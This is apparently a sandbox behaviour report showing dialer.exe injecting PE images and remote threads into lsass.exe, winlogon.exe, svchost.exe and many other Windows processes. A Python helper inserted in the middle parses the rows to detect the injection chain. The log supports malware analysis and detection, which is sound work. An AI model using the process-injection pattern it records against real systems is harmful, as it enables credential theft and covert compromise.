Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1CBD1BD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28A84D30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 28571390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2551B760000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20C383F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20C38E60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Code function: 14_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,14_2_0000000140001C88
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 5895273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: ADFC273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: DD59273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 589B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AE89273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DE1A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9E273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E107273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 652E273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A27A273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FB3C273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 567273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C1F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: E3BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3895273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6E56273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1FF7273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F35273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7957273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A46273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1311273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C58273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5F1D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D9C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AEC9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC1B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8253273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66EB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FD9A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CEDB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4279273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B6F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8DCA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7373273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F9DB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CCC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FA39273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B727273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 53B5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E88A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 77B5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D34273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B5E1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5999273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 53C2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 41D4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ADAD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 307273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4DB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 11C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C528273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 76AA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F1B3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F34F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DE4D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7452273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9D0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF8C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D893273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E93273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4412273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 97E3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC87273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 698D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 34C5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4354273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8434273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5892273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6990273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8338273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FA70273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D1BD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84D3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7139273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1B76273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 383F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 38E6273C
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160C9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160C9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 11C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CE69900000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29283380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 193FA700000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1CBD1BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A84D30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 28571390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2551B760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C383F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C38E60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: PID: 1028 base: 11C0000 value: 4D
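The rows above describe one injection chain repeated per target: an RWX allocation in a foreign process, a write whose first bytes are the PE magic 4D5A at that same base, and a thread started in that process. As an added example (not part of the Joe Sandbox report or product), the following Python reads rows in the report's format, tolerating the fused "dialer.exeMemory allocated" form in which the column separator was lost and the trailing "Jump to behavior" link text, groups them per source process, names the sources that show the complete chain, and resolves the "unknown" thread targets: the report prints only the low 32 bits of the thread start address, and from the rows where the target is known the entry offset inside the written image can be learned and matched against the other written bases. The sample rows are constructed from entries above; the list of sensitive processes and the offset sanity bound are assumptions for triage, not Joe Sandbox logic.

```python
"""Triage helper for Joe Sandbox behaviour rows (added example, not the report's own code)."""
import re
from collections import defaultdict

# Constructed sample in the report's own row format (a few of the rows above, in
# both the separated and the fused form, one of them with the link residue).
SAMPLE_LOG = r"""
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1428DCA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC273CJump to behavior
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 589B273C
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: PID: 1028 base: 11C0000 value: 4D
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
"""

# Source path ends in ".exe"; the separator after it may be a tab, a space or nothing at all.
HEAD_RE = re.compile(
    r"^Source:\s*(?P<src>.*?\.exe)\s*"
    r"(?P<action>Memory allocated|Memory written|Thread created)"
    r":\s*(?P<rest>.*)$"
)
# Field names that follow the target; "value starts with" must be tried before "value".
FIELD_RE = re.compile(r"\s+(base|protect|value starts with|value|EIP):\s+")
# Assumption: processes whose compromise matters most when deciding what to escalate.
SENSITIVE = {"lsass.exe", "winlogon.exe", "dwm.exe", "explorer.exe", "services.exe", "csrss.exe"}


def parse_line(line):
    """Return one row as a dict (src, action, target, plus base/protect/value/EIP) or None."""
    line = line.strip()
    if line.endswith("Jump to behavior"):  # link text carried over from the HTML report
        line = line[: -len("Jump to behavior")].rstrip()
    m = HEAD_RE.match(line)
    if not m:
        return None
    parts = FIELD_RE.split(m.group("rest"))  # [target, key, value, key, value, ...]
    event = {"src": m.group("src"), "action": m.group("action"), "target": parts[0]}
    event.update(zip(parts[1::2], parts[2::2]))
    return event


def name(target):
    """Lower-cased file name of a path; 'unknown' and 'PID: n' targets are kept as they are."""
    return target.rsplit("\\", 1)[-1].lower() if ":\\" in target else target


def summarise(log_text):
    """Per source process: RWX allocation targets, MZ-headed write bases per target, thread EIPs."""
    per_src = defaultdict(lambda: {"rwx": set(), "pe_writes": defaultdict(set), "threads": []})
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        s, tgt = per_src[name(ev["src"])], name(ev["target"])
        if ev["action"] == "Memory allocated" and {"execute", "write"} <= set(ev.get("protect", "").split()):
            s["rwx"].add(tgt)
        elif ev["action"] == "Memory written" and ev.get("value starts with", ev.get("value", "")).startswith("4D"):
            s["pe_writes"][tgt].add(int(ev["base"], 16))
        elif ev["action"] == "Thread created":
            s["threads"].append((tgt, int(ev["EIP"], 16)))
    return per_src


def resolve_threads(s):
    """Map each 'unknown' thread EIP to the written image whose base + learned offset has that low dword."""
    offsets = {(eip - base) & 0xFFFFFFFF
               for tgt, eip in s["threads"] if tgt != "unknown"
               for base in s["pe_writes"].get(tgt, ())}
    offsets = {o for o in offsets if o < 0x1000000}  # assumption: entry lies within 16 MiB of the base
    resolved = {}
    for tgt, eip in s["threads"]:
        if tgt == "unknown":
            for cand, bases in s["pe_writes"].items():
                if any((base + off) & 0xFFFFFFFF == eip for base in bases for off in offsets):
                    resolved[eip] = cand
    return resolved


def verdict(log_text):
    """Sources that show the full chain (RWX alloc + MZ write + remote thread) and what they reached."""
    hits = {}
    for src, s in summarise(log_text).items():
        chain = s["rwx"] & set(s["pe_writes"])
        if chain and s["threads"]:
            resolved = resolve_threads(s)
            reached = set(s["pe_writes"]) | set(resolved.values())
            hits[src] = {"chain_targets": sorted(chain),
                         "sensitive_hit": sorted(reached & SENSITIVE),
                         "resolved_threads": resolved}
    return hits


if __name__ == "__main__":
    for src, info in verdict(SAMPLE_LOG).items():
        print(src, info)
```

On the sample, dialer.exe is the only source with the full chain, and the unknown EIP 589B273C resolves to the winlogon.exe image at base 1E8589B0000 through the offset 0x273C learned from the lsass.exe row. Run over the complete row set above, the same rule resolves the other unknown targets, for instance EIP DE1A273C to the svchost.exe base 195DE1A0000 and EIP C9E273C to the dwm.exe base 1160C9E0000, so "unknown" in these rows is a reporting gap rather than a different kind of thread.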
Source: C:\Users\user\Desktop\file.exe	Thread register set: target process: 6768
Source: C:\ProgramData\IGaming\driver.exe	Thread register set: target process: 7120
Source: C:\ProgramData\IGaming\driver.exe	Thread register set: target process: 2876
Source: C:\ProgramData\IGaming\driver.exe	Thread register set: target process: 528
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160C9B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A2D50000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 140AE890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160C9E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000
